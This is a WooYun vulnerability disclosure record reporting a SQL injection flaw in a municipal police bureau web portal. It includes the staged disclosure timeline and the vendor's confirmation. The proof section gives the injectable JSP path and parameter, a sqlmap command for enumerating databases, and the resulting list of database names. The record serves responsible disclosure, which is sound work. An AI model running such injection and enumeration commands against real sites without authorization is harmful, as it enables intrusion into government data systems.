Vulnerability summary

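Bug ID: wooyun-2015-0153770

Title: SQL injection vulnerability in a sub-site of a municipal Public Security Bureau

Vendor: First Research Institute of the Ministry of Public Security (公安部一所)

Author: 隔壁老三

Submitted: 2015-11-17 16:47

Fixed: 2016-01-11 15:32

Made public: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (First Research Institute of the Ministry of Public Security) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]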


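Vulnerability details

Disclosure status:

2015-11-17: Details sent to the vendor; awaiting vendor handling
2015-11-24: Vendor confirmed; details disclosed to the vendor only
2015-12-04: Details disclosed to core white hats and experts in related fields
2015-12-14: Details disclosed to regular white hats
2015-12-24: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

Not digging any deeper, to avoid a knock on the door.

Detailed description:

Another injection.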

Proof of vulnerability:

Injection point: http://**.**.**.**/zjlsga/cmsWebapp/zjls/jsp/zxzx/zxzxDetail.jsp?unid=7FFF5E28F34020285F5E75C6B28DA372
Injected using sqlmap:
-u "http://**.**.**.**/zjlsga/cmsWebapp/zjls/jsp/zxzx/zxzxDetail.jsp?unid=7FFF5E28F34020285F5E75C6B28DA372" --dbs
available databases [26]:
Database: CMS
[69 tables]
Database: SYSTEM
[161 tables]
Database: CTXSYS
[50 tables]
Database: DBSNMP
[20 tables]

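Fix:

You know what to do.

Copyright notice: when reposting, please credit the source 隔壁老三@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2015-11-24 14:11

Vendor reply:

Thanks for the submission!! We have verified and confirmed the described issue and have notified them to fix it.

Latest status:

None yet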

